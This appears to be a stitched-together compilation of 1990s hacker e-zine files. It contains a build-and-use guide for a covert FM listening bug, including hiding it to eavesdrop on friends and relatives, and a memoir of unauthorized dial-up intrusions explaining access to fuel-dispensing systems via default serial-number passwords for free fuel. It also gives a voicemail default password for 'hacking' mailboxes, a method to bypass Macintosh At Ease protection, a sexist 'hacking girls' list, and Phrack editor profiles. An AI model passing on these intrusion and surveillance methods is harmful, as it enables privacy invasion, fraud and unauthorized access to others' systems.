 1- 1M surface mount

 1- 10p disc ceramic
 1- 39p disc ceramic
 1- 1n disc ceramic
 2- 22n disc ceramics
 1- 100n monoblock (monolithic)
 1- Air trimmer 2p-10p

 2- BC 547 transistors
 1- 5 turn coil 0.5mm enameled wire
 1- electret mic insert- high sensitivity
 1- 9V battery snap
 1- 15cm tinned copper wire
 1- 30cm fine solder
 1- 170cm antenna wire

NOTE: use 170cm of electrical wire for the antenna, this length will give
you maximum range, however since the antenna wire needs to be extended
when bugging the concealability might be a factor. You can shorten the
wire's length but this will shorten the range yet make it easier to
conceal. Weigh the factors and do whats right for you.


        First familiarize yourself with the layout of the components.
Now the only polarized (parts that have to put around the right way) are
the two transistors, the battery and the microphone. All other parts can
be soldered either way around. I recommend using this order for assembly
as it is the most practical and easiest way to build the bug.

                1.  5 surface mount resistors.
		2.  6 capacitors.
		3.  2 transistors.
		4.  air trimmer
		5.  5-turn coil.
		6.  battery snap.
		7.  microphone.
		8.  antenna wire.


        If you dont know how to read the value of a surface mount
resistor or disc ceramic capacitor read on.

Surface mount resistor: These have three numbers, with the first two
digits being multiplied by the third. The third digit represents how
many zeros after the first two. For example a surface mount resistor
with code 1-0-5 would mean that the first two digits (1-0) would be
multiplied by 5 zeros. To give the value 10 00000ohms or 1Mohm.

Capacitor: These are similar to the above but the base number is pF or
pico farads. eg a capacitor labeled 2-2-3 has the value of 22 000pF.


        The FM bug circuit consists of two stages: an audio amplifier 
	and a RF oscillator stage.


        The microphone detects audio in the form of air vibrations that
enter the hole at the end of the microphone and move the diaphragm. The
diaphragm is a thin piece of metalised plastic and is charged during
manufacture. Some of these vibrations pass down a lead which touches it
to and into a FET transistor. A FET transistor has a very high input
impedance and does not have a loading effect on the charges. The audio
then gets passed through a BC 547 transistor which amplifies the sound
around seventy times. The BC547 then passes it to the base of the
oscillator stage.


        The 47k resistor picks up the pulse from the transistor and then
turns the second or oscillator transistor ON, but the 47k resistor has a
value so that it will not turn the transistor on fully. So the feedback
pulse from the 10p capacitor turns it ON fully.

        Normally a transistor is turned ON/OFF via the base, however it
can be also done by holding the base firm and differing the emitter
voltage. In the FM bug this is whats done, the 1p capacitor holds the
base firm and the 10p feedback capacitor differs the emitter voltage.
However for a capacitor to do this the emitter must have a DC voltage
that can be increased and decreased. The DC voltage is about 2V and the
base will be 0.6V higher than this so the base voltage is fixed at 2.6V
by the 1p capacitor. The voltage does not rise or fall when the
oscillator is operating only when the audio is injected into the base
via the 100n capacitor. This is how the circuit works and continues like
this at a rate of about 100 million times per second.

        The oscillator is designed to operate at around 100mhz, however
this figure is dependent on a lot of factors such as the 6 turn coil,
the 10p capacitor and 470R and 47k resistors also and the figure of
operation is about 90mhz (my FM bug operated at 88.5mhz). 


        Ok so you have built the bug now and are ready to use it. Well
first of all you will need some sort of FM radio. Alright put the bug
next to or near the radio's antenna. Turn the bug and the radio on.
Alright starting from the bottom end of the radio's FM scale. Slowly
progress your way through the FM band. Usually your bug will tend to be
around the 85-95mhz range. Once you hear a beep (because your bug is
close to the radio) or any other strange static noise stop. Alright you
might have been lucky and your bug is exactly tuned already, however in
most cases you will need to adjust your bug slightly. Using a small
screwdriver slowly turn the air trimmer, whilst doing this babble out
some words, stop turning until the echo of your voice through the radio
becomes crystal clear. Your bug is now tuned and you are ready to put it
to use.

        You might have some problems with your bugs frequency being
exactly same as a radio stations. No problem, by compressing or
uncompressing the coil you can change your bugs frequency. Use the coil
method if your bug is in the middle of a few radio stations frequencies,
if you just need to move it up or down one or two mhz then use the air


        Many of you already have your ideas on how to use the bug.
Remember it might be illegal in your Country/State/city to use this bug
in the way you intend. Hey its up to you I dont mind, however I take no
responsibility if you get in trouble.

        Anyway here are a few "friendly methods":
        1. CHRISTMAS. Yes it will soon be that time of year again, and
this time also brings a great opportunity to discover some of those
family secrets or maybe even find out what lame presents those relatives
have brought you and save you from the disappointed face they will see
when you open it.

        Okay put the bug either in the pot the tree is standing in or
fasten it to a branch relatively close to the bottom of the tree. We
place it at the bottom of the tree because the antenna needs to be
extended if we want really cool range. Okay put the bug in its position
and then unravel the wire all over the tree.

        2. TV listening. Okay if you are out in the backyard whether it
because you want to, or there is some chore that needs to be done. You
can listen to a favorite TV show, or a basketball game or such. I know
your saying why not listen to the radio, well you now have a choice of
listening to a radio station or one of the 10000000 TV channels your
state offers you.

        Set the bug up about 3-5m away from the TV, then adjust the TV
volume so that it is just right to hear on your radio.

        3. Bug-a-friend. Okay you can bug your friend to see what he/she
is up to. Okay you will need to know where your friend goes and then
previously go there and set up the bug and your listening point. Make
sure that you set up a place where conversation happens, it is very
boring listening to insects and such.

        Conceal the bug anywhere within a 3-5m radius of where your
friend talks and stuff. Now conceal yourself and then sit back and

        Now there are a few of the more "legally friendly" methods,
there are thousands more not-so-friendly and even malicious
methods <Oooooooo> that I will leave up to your imagination.


I hope the information contained can help you successfully build a bug,
and then good luck using it. If you have trouble just e-mail me. If you
can not get hold of some of the components, you can order them through
me. Also if you want a bug, but dont have the electronic skill to do it,
you can buy pre-built bugs through me.. just e-mail me. may the force be
with you



My short time as a hacker.

by Kwoody
  I live in a small town in northern British Columbia where the city
  owns the phone company. All of BC is serviced by BCTel, except here in
  Prince Rupert. The phone company used, up until 1991, mechanical
  switches, no lie! Tech dating back to the 50's sometime. I know this
  because I know some of the workers of CityTel. (The name of the phone
  company). Because of this they were not able to offer all the goodies
  like Caller ID, Call Forward etc...and it was easy to hack then, not
  the phone company, but all the other systems in this small town of
  16000+ people.
  I got into hacking sort of accidently. I have had a computer and modem
  of one kind or other since about 1983. I moved here after high school
  in 1986 and found a good paying job I have worked at for the last 8
  years. One night night in 1990 I was sitting around with my roommate
  having a few beers and decided to call a buddy of ours to come over
  but I dialed the number wrong and got a computer tone. Cool I
  thought... I knew the numbers of the 2 local BBS's and that wasnt one
  of them.
  I fired up the computer and called it again. I got the prompt: 
   Xenix 386 Login:. 
  I had some knowledge of other OS's and knew this was some kind of Unix
  box. A friend of my roomie was going to university (UBC) and he
  happened to phone that night. I chatted with him for a bit and told
  him what I had found. He told me to try sysadm or root. I got in with
  sysadm, no password!
  I found that I had complete control of the system and it belonged to
  the local school board. I bought a book on Unix and learned as much as
  I could about the system and Unix in general. I guess being a rookie
  (read lamer?) and not knowing shit about how to cover my tracks they
  discovered the system had been hacked and shut down the dial-in. They
  went back online a few weeks later and left sysadm wide open no
  password again. I could not believe it! Even after being hacked they
  still left their system open like that.
  By now I was hooked and I wanted to see if there were any other
  systems in town. I could program a little in Pascal and basic (lame)
  and tried to write a dialer of some kind. No instead I figured
  out the script language of Q-modem and wrote a 40 line script that
  worked. It dialed all numbers sequentially but I did not worry too
  much about being caught since the switch they used was so ancient
  because they didnt have caller ID or anything like that yet.
  I did not know at this time of the hacker community and some of the
  programs available that would do this already. And even if I did I
  wouldnt have known where to call and get them. At any rate I had two
  computers an XT and a 386 both with modems and two phone lines, one I
  used as my normal voice line and one for data. I setup the dialer on
  both and away I went. By the time I had finished scanning both the
  prefixes, 624 and 627, I found about 30 computers. Of those I was able
  to get into about 10. All of them used defaults and all except the one
  below were Unix boxes.
  Although I did find one number that connected at 1200 I think it
  belonged to the phone company. After I was connected nothing would
  happen. I tried for a while to get a prompt of some kind then suddenly
  a line of text appeared that listed two phone numbers and some other
  stuff that I cant remember. So I just left it alone for a while to see
  what came up. It soon became clear that the numbers in one column were
  always one of 4 numbers. RCMP, Fire Dept, Battered Womens Shelter and
  a second RCMP detachment. It looked like it recorded all calls coming
  into those 4 places.

  One hack I did was on a system that dispensed fuel. It was called a
  KardGuard 3000C. I knew of two places in town that had these systems.
  One was where I worked and the other was our competitor. And since I
  knew how it worked it was easy to get in. I saw their volume of fuel
  dispensed and such and could have done really nasty things like erase
  their transaction buffer or get free fuel from them. But I didnt since
  I did not see the point in hurting them or their system even if they
  were our competitor.
  For those of you who might find such a system I'll give a brief run
  down on it. The hardware is limited to 300 bps 7E1 and consists of a
  few things.
  You can tell the system as it announces it when you connect: 
  KardGuard 3000C Motor Fuel Dispensing System. 
  The system uses punch coded cards read by a card-reader. You have a 4
  digit security code that you need to activate the pump to dispense
  fuel. Everything is kept track of by a computer that reads the amount
  of fuel pumped, date, card number and a few other things depending on
  how the card is coded. Like odometer reading or car number.

  Now to get into this system via dial-in all you have to know is the
  Serial Number of the system. All of these type systems use the serial
  number as the default password to access it via dial-up. And its easy
  to get the serial number. If you know the location of the card-reader
  go and look on the side of it. Generally the actual card reader is
  housed in a metal box. On the side of the card reader itself near the
  back is a small sticker and the serial number will be written on the
  sticker. That was how I did it. I just went to their card reader and
  took the serial number off it and got in.

  Once in you can do any number of things. Shut off the pumps or
  manually activate them without a card and get free fuel, see how much
  of any product was dispensed. Products range from 0-15. 0 being
  regular gas, 1 regular unleaded etc. It is fairly limited of what you
  can do but you can do some nasty stuff to the company who owns it if
  you know how. A note to this all commands must be UPPERCASE. And all
  commands are one letter. Like E is for looking up the 4 digit code for
  individual cards. I dont remember all of them as we upgraded to the
  latest version of the KardGuard which supports up to 14.4k and is a
  faster system.

  After about 3 months of this sort of stuff I was at work one Saturday
  and got a phone call from a Constable Burke of the RCMP Special
  Investigation Unit.
  He informed me that he knew about my hacking and would like to take a
  look at my computers. I told him that I didnt know what he was talking
  about, he just said we could do this the hard way and he could get a
  warrant to search the place. He wanted to meet me at my place in 10
  minutes. I said ok. I was shitting bricks by this time. I phoned my
  roomie and told him to get all printouts and disks out of the house
  and take them away...anywhere. I took off home and got there to find
  my roomie gone with all printouts and disks. I fired up the computers
  and formatted both HD's. Formatting a hard drive had never taken so
  long before!!

  I waited for like an sign of the cops. My roomie came back
  and said where are the cops? I dont know I told him. I waited some
  more still no sign of them. I got a call about 3 hours later from a
  friend of my roomie and he asked if Constable Burke had showed up. I
  asked how he knew about that and all he did was laugh his ass off! Now
  I was thinking joke...bad joke...and it was. I managed to find out
  that this "friend" had gotten someone to pose as a police officer and
  call me to see my computers regarding hacking. Well the guy he got to
  pose as a cop did a good job at fooling me. I guess I was just over
  paranoid by this time. Plus I was really pissed as I lost a lot of
  info that I had acquired over the previous months when I formatted my
  hard drives.
  I guess my roommate had been telling a few people about what I was
  doing. I was more than a little pissed off at him as I had not told a
  soul of what I was doing since I knew it was illegal as hell. I got my
  disks back and burned the printouts and laid off the hacking for a few
  weeks. I started up again and was a tad more careful. I didnt keep any
  printouts and kept the info on disk to a minimum.
  Then about a month later my roommate, who worked for our landlord,
  came home one day and said that our landlord had been approached by
  some RCMP officer regarding me and my computers and what I might be
  doing with them. I said is this another joke? No he said, go talk to
  him yourself. I did but he wouldnt tell me much except that something
  was definitely going on regarding me, my phones and my computers. And
  the RCMP were involved.
  After asking around I found out that quite a few people knew what I
  had been up too. All they knew is that I was some guy who had been
  cracking systems in town. But word had spread and I still dont know
  how the cops found out or how much they knew.
  But after talking to my landlord I quit right there and then. I went
  home formatted the drives again, all floppies and got rid of
  everything. I had hacked my way through everything in town that I
  could in about 6 months. Also by this time CityTel had upgraded their
  switch to some of the latest tech and had Caller-ID installed along
  with all the other goodies you can get these days. It was definitely
  time to quit.
  Not long after I started a BBS that I still run to this day. I figured
  that was a way to kill the hacking urge and be legit. I dont live with
  that roommate anymore. I'm married now and still think about it now
  and again but have too much to lose if I do and get caught.
  On another note about 3 months ago I was at work and dialed a wrong
  number. As fate would have it I got a blast of modem tone in my ear.
  My old hacker curiosity came alive and I made note of the number. We
  have a small lan at work that has a modem attached and when I had a
  free moment I dialed the number up. I got the banner:

  city telephones. No unauthorized use. 

  xxxxxxx <----a bunch of numbers

  I hung up right there but it was interesting to see that I had found
  CityTel's switch or something of that nature.
  To this day I dont know if there were any other hackers in this small
  city where I live. As far as I know I was the only one that did any of
  this sort of thing. It was fun but near the end I could feel the noose
  around my neck. And I quit while the quitting was good.
  Today I help admin our small lan at work with 2 servers and 8
  workstations and the Unix I learned hacking helped me when my boss
  first started to get serious about computerizing the business. Since
  then I have been able to help setup and maintain the systems we have
  I'll give the specs on our new KardGuard if anyone is interested as I
  know they come from the States and there must be more than a few out


                          USING ALLTEL VMBs

                          By Leper Messiah
Ok. This is everything you need to know in hacking AllTel Mobile's
Voice Mail.  The default password on all their boxes is 9999.
Here are the docs, word for word.  Enjoy!


Accessing your mailbox
Changing your security code
Recording your name
Recording a personal greeting
Playing a message
Recovering deleted messages
Playback mode options

All of the Basic Features plus...
Setting up your greeting schedule
Replying to a message
Redirecting a message
Recording and sending a message
Creating a broadcast list
Personal greeting schedule

At a glance

VOICE MAIL SET UP                    Press

To change your security code        8 2 3
To record your name response        2 3 3
To record your personal greeting    2 2 3
To edit a greeting in your schedule 2 2 7
To activate your greeting schedule  2 2 8
To change your playback mode        8 8 3


To play a message                   1
To save and play the next message   2
To reply to a message               3
To redirect a message               7
To create and send a message        3

Accessing your Voice Mail

1.  Access your Voice Mail.
    From a cellular phone press
    # 9 9 Send.
    From a landline phone dial your
    cellular phone number, which will
    automatically transfer to your voice
    mail and press # when greeting begins.

2.  Enter your security code.

Creating/Changing your security code

1.  Access your Voice Mail.
2.  Press 8 for Personal Options.
3.  Press 2 3 to change your security code.
        * Note: Your security code can contain 1 to 7 digits.

Recording your name

1.  Access your Voice Mail.
2.  Press 2 for your Greeting Menu.
3.  Press 3 3 to record your name.
4.  Record your name, finish by pressing #.
    Press 3 1 to play your name.
    Press 3 3 to erase and re-record your name.

Recording a personal greeting

1.  Access your Voice Mail.
2.  Press 2 for Greeting Menu.
3.  Press 2 1 to play your greeting.
4.  Press 2 3 to record your greeting,
    record your greeting, finish by pressing #.

Playing a message

1.  Access your Voice Mail.
2.  Press 1 to play your messages.
3.  Message will play.
    Press 1 to keep this message
    as new and play the next.
    Press 2 to save and play the
    next message.
    Press 3 to reply to a message.
    Press 4 4 to replay a message.
    Press 5 to erase a message.
    Press 7 to redirect the message.

Press 8 8 3 from the main
menu to choose a playback mode.*
Continue to press 8 3 until the
desired playback mode is selected.

        * Note: The system has three playback modes:
        normal, automatic, and simplified.

Recovering deleted messages

To recover a message that has been deleted: **
Press * 1 to go to the main menu,
Press * 4 to recover all deleted messages.

         ** Note: Deleted messages can only be recovered
         before you exit the mailbox.

Replying to a message
From the Play Menu:

1.  Press 3 during or after a message.
2.  Record your reply finish by pressing #.
3.  Press 3 to continue recording a voice message.
    Press 5 to erase a message.
    Press 7 to select a special delivery option.
4.  Press 9 to address the message.
    If sent from a subscriber's mailbox,
    the reply with be automatic.  If not, enter
    the mailbox number.

Redirecting a message
From the Play Menu:

1.  Press 7 during or after a message.
2.  Press 3 to continue recording a
    voice message.
    Press 5 to erase a voice comment.
    Press 7 to select a special delivery
    Press 8 to play the original message.
3.  Press 9 to address the redirected message.
    a. mailbox number
    b. broadcast list number.

Recording and sending a message

1.  Access your Voice Mail.
2.  Press 3 to record a message.
3.  Record your message finish by
    pressing #.
      Press 3 to continue recording a
      voice message.
        Press 4 4 to review the
          recorded message.
        Press 5 to erase a message.
        Press 7 to select a special
        delivery option.
          Press 1 to mark a message urgent.
          Press 2 to mark a message confidential.
          Press 3 to select notification of non-delivery.
          Press 4 for future delivery.
          Press 5 to delete special delivery tags.
4.  Press 9 to address a message.
    mailbox number
    broadcast list
    0 + last name - 0 + first name

Creating or editing a broadcast list

1.  Access your Voice Mail.
2.  Press 6 to access your broadcast list.
3.  Press 3 to create or edit a broadcast list.
4.  Enter a one- or two-digit broadcast
    list number.  If new list, select any one-
    or two- digit number.  If editing, enter
    the one- or two- digit number assigned.
5.  Enter all of the destinations.
    Press # after each destination entry.
    (destinations can be mailbox
    number or broadcast list numbers.)
6.  Press 7 3 to record a name for
    your broadcast list.
7.  Press # when finished.

Setting up your greeting schedule.

1.  Press 2 from main menu.
2.  Press 2 6 to select your active greeting.
3.  Enter the greeting number you want active.
4.  Press 2 7 to edit a greeting.
5.  Enter the greeting number to be edited.
     Press 1 to play the current greeting.
     Press 3 to record a greeting.
     Press 5 to erase the greeting.
     Press 7 to change the time
     interval for this greeting.
     Press 8 to review the time interval
     for greeting.
6.  Press 2 8 to activate/deactivate
    your greeting schedule.

Message waiting notification

1.  Press 8 for Personal Options menu.
2.  Press 6 for Notification Options.
3.  Press 1 to play notification telephone number.
         Press 6 to enable/disable
         message notification.


To rewind by 6 seconds                   4
To rewind to the beginning of a message  4 4
To fast forward by 6 seconds             6
To fast forward to the end               6 6
of the message
To replay the date and time stamp        8 8
To stop and function                     #
To return to the main menu               * 1

Good luck hacking.
-- Leper Messiah


Hacking At Ease for the Macintosh.................. By: Ace


        Some educational institutions and businesses use At Ease to
discourage the pirating of programs and access to sensitive files, and
generally screwing up any fun you would have!  Wouldn't it be nice to
know how to be rid of it??

How to:
        Well, this will tell you how to remove the password for At Ease
so you can gain access to the Finder, and also let you change the
password to one of your chosing, really screwing some one up.

        First off, the computer you will need a copy of Microsoft Word
5.1 or 6.0  (Norton Utilities Disk Editor will also work,  and I'm
trying my best to find other programs that will allow you to do this).
Launch Microsoft Word and go to the "File" menu,  and select "Open".
Now change the "File Type" to "All Files".  Navigate to the Preferences
folder and open At Ease Preferences. It should look like a giant mess.
Somewhere in there is the password.  It doesn't really matter where.
Select all of the text with Command-A and press the delete key,  and
save the now empty file.  Restart the computer.  Now you can select "Go
to finder" from At Ease's menu.

Other Programs:

        You can also use the following program called DisEase. There is
also a HyperCard stack that will bypass At Ease.  I have used them both,
although I feel that using the above method is better.

          /  _  \
         /  / \  \
        /  /___\  \ce
       /  _______  \
      /  /       \  \

(This file must be converted with BinHex 4.0)



Hackin' GIRLS 'n SYSTEMS - .... 

by SevenUp - -

Hitting on girls and hitting on systems (I'll call them both "targets")
has quite some similarities. If you are good in hacking one of them,
it won't be too hard to enter the other one....
It also represents IRC channel #hack's current state of mind: 
Women's talk is taking over. 


- Biggest Challenge: 
  To get inside the first time

- Targets that have already been successfully hit by others lose a lot of
  their attraction

- The goal is to keep as many successfully (formerly virgin) targets as

- Different game: Hit one target from every region

- Mark every target you hit

- You don't really care much after you got your target, unless (in rare
  cases) you love it


- Key to Success:
  The right "defaults", depending on situation and targets

- Be Cool:
  Don't care too much about the target. Don't get involved
  emotionally, but play a little with the target.

- Knowing different languages and keywords may be useful with targets
  of different origins

- Social Engineering and spending time (sometimes money) might lead to your
  goal easier

- The more targets you'll hit on, the more you'll succeed. Just ignore any
  failings. Remember: Better to have tried (and maybe lost) than not even
  have tried.

- Best time to find targets is at night

- Backdoors are always inviting (sometimes dangerous)

- Don't start with the top target. Start slow and easy and look for more
  difficult ones after some success

- If you get rejected on the first time, don't give up. There is always
  a second chance

- When you just got little time to hit on the target, don't hesitate -
  a quick first try is never wrong and leaves you more time to think about
  your second step.

- Scanning (and probing) is neccessary. Don't give up, even your rate of
  success lays somewhere between 1% and 50%


- Be selective about your targets!

- Try targets with tight openings

- Targets with many users have more experience

- Targets with shadows / shades are harder to enter

- From the inside it's easier to reach the root-climax than from the outside

- Many targets look uninviting from the outside, but welcome you deeply

- Some targets are leaking even before touching them

- If a target blows, it sucks


- After entering it, let the target become active too! Let it do some work
  and see what comes up.

- To protect your target, close all openings and save the key

- Even some targets that suck can be nice

- Sniffing Targets:
  For lamers and perverts

- Fingering Targets:
  Can be interesting...

- Leeching targets dry makes fun, takes time and let's them become
  kinda useless

- The right wrapper controls the intrusion and its consequences


- Remember: The number of tries is limited. After unsuccessful hits, the 
  target and its environment will become aware - start searching in a new

- NEVER just pay to get into a target

- Don't fall for booby traps!

- When calling up targets, make sure their owner doesn't notice

- Don't use crack on the target... it fucks up the brain

- Don't fuck (up) the targets without protection

- Be aware: Some targets with change-root-environments can fake the
  root-orgasm, or make you feel coming inside when you are not inside

- Penetrating a target too hard could use up or damage your tools

- Try to identify faked and "cross dressed" targets before totally unwrapping
  them and finding a bad surprise

- When entering a virgin target the first time, you have to wipe the tracks -
  this can often be messy

- Remember to get out of the target when you fall asleep

- Never lose your mind over the beauty of a target. Always check for guards.

- If you don't watch out, you may get a lifelong sentence after a 9 month trial.


                              ==Phrack Magazine==

                  Volume Seven, Issue Forty-Eight, File 5 of 18

                            -:[ Phrack Prophile ]:-

This issue, we have a "very special episode" of the Phrack Prophile.  As
everyone knows, Phrack is once again in flux, and an entirely new editorial
staff is coming on board.  In an effort to introduce everyone to these three
hackers, we've had them do profiles.  Ladies and Gentlemen (yeah, like any
ladies OR gentlemen read Phrack), meet your new editors:  Daemon9, ReDragon
and Voyager.


                              Prophile on Daemon9

        Nomenclature:  daemon9/route/infinity
        In real life:  Mike D.  (as in David, not Diamond) S.
                 DOB:  10.05.73
               Likes:  Women who aren't afraid to cry.
            Dislikes:  Hippies.  GOD, I hate hippies...
                 Ink:  Large back piece, and growing... (It's the outline of
                       a die.  (No, not as in a pair of dice, but as in a
                       computer chip...)
               Other:  Glock 19 with trigger-guard mounted laser-site.
            Passions:  Computers.  Computer Security (or lack there of).
                       Health.  Mental and Physical aptitude.
           Main URLs:
Years with Computers:  14ish
     Computers Owned:  Towers: P90/32MB/3GIG (Windows NT/Solaris/DOS-WFW)
                Mids:  P120/32/2GIG (Linux), 486-66/16/700MB (FreeBSD),
                       486-50/16/540 (Linux)
             Laptops:  P133/16/800, (Windows NT/Linux)
                       486-75/16/500 (DOS/WFW)
      Networks Owned:  The Information Nexus (

               Music:  Front242, FLA, The Goats, NIN, Diatribe, 16Volt,
                       Morphine, etc...
              Movies:  Usual Suspects, Miller's Crossing, Sneakers, Fletch
                       Army of Darkness, True Romance, NBK, etc...
               Books:  TCP/IP Illustrated vols. I-III, UNP, Applied
                       Cryptogrpahy 2nd edition, Computers and Intractablity:
                       A Guide to the Theory of NP-Completeness, and so on...

A Bit of History

	Ah, the days of my youth...  Carefree, happy-go-lucky, life was a big
open door to me.  One spring a very good friend of mine told me I should get
an ``Internet'' account to write him mail while he was away at school.  
...Was my concise reply.  I was deep into the computer thing at that time, 
but I had not gotten into the Internet yet.  Well, we went out and bought
a (at the time) $200 2400 BPS modem and got me hooked up with this brand new 
service provider, NetCom Online...  At first I merely used the thing for 
email, but soon after I taught myself all about Unix, I discovered all the 
wonders of Usenet and IRC (AKA the Big Waste).  Most people know me from my
frequent alt.2600 presense.  That's where I met Voyager.  We quickly found
that we had the same interests as far as computers and hacking went.  The 
rest is history...  Sorta.

The Theory Behind It All

	When I look back and try to figure out how the hell I got here, I have
one person to thank.  My father.  He bought me my first Commodore 64.  I can
remember hooking that archaic thing up to my TV,  writing my own adventure 
games in basic, and saving them to a tape drive.  My computer time line goes
something like this:

c64  Apple IIc IBM XT  IBM 286 486/33 486/66  P90 486/66 486/50 P120 P133...   
1982   1984     1986     1987   1991   1992  1994  1995   1996  1996 1996

	I am not happy unless I am bathed in a contstant stream of extraneous 
RF radiation.  My room is alive with a myriad of blinking and flashing lights,
several humming fans, and hundreds of feet of fire-hazard-inducing cables.  
I have to put tin-foil on all of my windows just to keep the sun out and the 
temperature down.  You'd be amazed how well that works.

	The pursuit of knowledge is what led me down the path I am following.
I am simply not satisfied with knowing that something works.  I need to 
know why and how, and how to break it and then how fix it...  I do not solve a
problem by merely finding a work-around.  I slam head on into the fucking 
thing and work with it until a solution presents itself.  
	Intelligence, to me, is not what you know, or how much you know. It is 
the ability to reason logically and rationally when the need arises and, if 
pragmaticism is not the best approach, let intuition and chaos guide you.  
Intelligence is adaptive and ever-changing...  Memory capacity is too often 
mistaken for smarts...

People I Know

     Linenoiz:	The reason I fell into the whole Internet scene to begin with.
		Best friends for 12 years, I would not be where I am now 
		without him.  He is one of the most intelligent people I know.

	Nihil:	The reason I fell into the whole hacking scene to begin with.	
		We have had our differences over the years, but our computing
		interests are too similar to let petty squabbles come in the
		way of our friendship.  The other one of the most intelligent 
		people I know.
   Mythrandir:	I met Myth about 2 years on alt.2600.  Sharp kid.  Very sharp.
		We think so alike on some things it's freaky.  We'll get going
		on that Tiger Team soon enuff, Jeff...!
     Alhambra:	Strong coder.  We did the DemonKit for Linux (and are still
		working on it..;)).  Jeremy and I also have very similar 
		interests as far as hacking goes.  I am glad he is here
		with me in the Guild.  I need more people like him.  Not a
		risky gambler, but hey, I took care of that for both of us...

     Halflife:	Coder supreme.  

Shouts Out To

	Brent, Carrie, ColdFire, Crow, Halflife, Heather, Jason, Jen, Kev,
	Ka_mee, MikeP, Mudge, Shawn, SirSyko, Tim, Tom, Topher, Xanax, Vision

What I Have Done

	It used to be that you could find me in that group like clockwork.  I
was always there.  Reading, posting, flaming, lurking.  That was me.  For 
years.  This is where most people probably first remember me from.  I took
it upon myself to self-moderate and answer all the questions I could possibly
handle...  I usually posted several times daily.  At last count, I posted over
2100 times (according to  ~/.tin/posted).  I was prolific.  I have fond memories
of back then...  But, times have changed.  That group has gone almost completely
to hell (AKA the way of #hack).  Thesedays, it's a fucking miracle if I find a 
worthwhile thread to follow-up to... These days, look for me on*, 
comp.protocols.tcpip, sci.crypt, and so on... 

	Oh yeah, I wrote some code and a few rag-tag articles for some Zines 
out there.  Can't remember the names...

	the Guild 
	The Guild is my group of roudy Internauts.  I started the group about
20 months ago for several reasons, some of which are just *now* becoming 
clear to me.  For a while there, we were putting out a zine, The Infinity 
Concept, but that is on hiatus while I do Phrack.  Various members have done 
coding and exploits.  Look for more to come from the Guild...
	Somewhere along the line about 2 years ago, I started to take 
advantage of netcom's free 5 megs of ftp space.  I put together a modest
collection of tools and whatnot (under 6 megs of stuff).  For some yet 
undiscovered reason, people flocked to the site.  I have no clue why.  It 
wasn't *that* great.  What I find even more fascinating is the fact that 
to this day people *still* go looking there for hacking paraphenelia.
The site has been vacated for almost a year now.  If you are reading this
and still have a link to my O-L-D netcom ftp site, UPDATE it to point to  I am *much* more proud of this site...  Hundreds of megs
of top-notch stuff here.  Anyway, the netcom site went down because Brian 
Smith (at the time the only member of the netcom security staff) told me I
couldn't have certian tools there for distro.  When I ignored him, he froze
my account.  This was the final catalyst in me deciding to start the 
Information Nexus...

	the Information Nexus
	Ah yes... The InfoNexus...  My frustration with Netcom led me to do 
what I had been wanting to do for some time, start my own site.  This site
would be a Haven for hackers, a place where they could come and be sure to 
find only the finest in technologies and tools.  A place of much learning and
information trade.  A knowledge dumping ground.  Thus was born the Information
Nexus.  With anywhere from 6-10 machines the Nexus is a heterogenous 
environment: the OS's range from several Unix flavors, several versions of 
Windows NT, and, of course, the mundane stuff (like DOS/WFW).  The main box,
Onyx, is a heavily tweaked Linux machine.  It is a P120 with 32MB RAM and 2
GIGs of HD space.
	As it stands now, accounts are given on restricted basis, only to 
friends and people I know (or people whose reputation precedes them).  As soon
as I upgrade the link from a 28.8 modem I will start offering accounts to the 
masses, at a nomial fee.  I will also open up ftp access, allowing a greater 
number of users at all hours.

	The Infinity Concept
	TIC is the zine the Guild put out.  Some of the noteworthy subjects 
written on: Cryptography, Windows NT security,  Unix security,the security 
of PGP, and several coding projects...   We have done 3 issues to date, but
I have stopped further production of the zine to devote my full attention to
Phrack magazine.

	Phrack Magazine
	Several months back, I hopped on IRC with some of my Guild-mates and
was having a wonderous discussion on, oh, nothing.  Well, Voyager was on, and
he dragged me into a private chat.  He told me about ErikB stepping down, and
told me he and ReDragon were to take over as the new editors...  I was very 
happy for him, and told him  I would have jumped at the chance to do it.  That 
was his next question...  Since then, ReDragon, Voyager and I have been 
salivating like dogs waiting to get our hands on the legend that is Phrack 
	My pledge is twofold: Timely distribution and nothing but the highest
quality articles.  We will be distributing Phrack on a regular seasonal 
rotation and will weed out all but the top-notch articles.  I plan to write
at least one article per issue.  I promise this much: You will not be 


                              Prophile on ReDragon


              Handle: ReDragon
            Call Him: Dave
        Past Handles: Dr. Disk (circa '84), The Destroyer (circa '88)
       Handle Origin: Thomas Harris Book, Saab insignia, D&Dish sort of
                      name, then I decided it would be cooler (and original)
                      if it was all one word and one D.
       Date of Birth: 12/30/75
 Age of current date: do the math yourself
              Height: 5' 11"
              Weight: 175
           Eye Color: Green
          Hair Color: Brown
           Computers: Apple ][e, Atari 800, 8088, 386sx/16, 386dx/40, and
                      right now a 486/33
   I got my Hayes Micromodem //e in the summer of '84.  I was eight years old
and with the help of my babysitter begged my way onto an H/P board.  I used
to read Phrack and write BASIC code, I was quite the clueless newbie for a
while.  People say age doesn't matter, but it does when you are that young.
My lameness continued, I learned Pascal, the years passed, and I started to
figure out how things worked.  I discovered Unix, it was cool.  I learned
what Crack was, I used it.  Years passed I started to figure out how things
worked.  I would go into more detail but I don't really care to tell the 
world about my life, ask me privately if you care.

ReD's Favorite Things
         Women:  yes
          Cars:  Saab
         Foods:  Taco Bell (doesn't everyone?), Young animals killed cruely
         Music:  Pink Floyd, Beatles, anything not techno
       Leisure:  IRC is bad for you, just say no.
 Alcoholic Fun:  Bottled beer, Jaegermeister, Long Island Iced Teas

Most Memorable Experiences

Saab car trouble in Queens on the way to HOPE.
Saab car trouble on PA Turnpike on way back from Pumpcon.
Saab stranded on George Washington Bridge on way to SummerCon '95.
Saab finally breaks down on NY Turnpike on way home.
SummerCon '95 (memorable that I don't remember any of it)
SummerCon '96 (the worst organized con I have ever been to)

Some People To Mention

The Green Machine (for altering my life more than I can imagine)
Acker (even though you gave up on it all, wish I knew what you were doing now)
Bluesman (why didn't you tell me about C earlier?)
Zorgo (for ruining my life showing me IRC)
Wozz (I still don't believe you grew up there)
r00t (you're all a bunch of idiots, but i love you)
Asriel (we are pretty similar people, except I'm not a narq)
Max-Q (screaming at me "Nice Fuckin' Con!" after Summercon '96, I was touched)
Taran King (you were cool to me when I was nobody, I was impressed)
Sirsyko (only hacker I know that I actually trust)
ErikB (annoying him enough made for an interesting summercon and a new phrack)
l0pht (for bringing back what hacking is really about)
b (stuff?)

Why Phrack?

   I have been in one way or another involved in the "hack scene" for more 
than half my life.  I spent a large part of that on the lower end of the
knowledge ladder, and throughout it all few people helped me along directly.
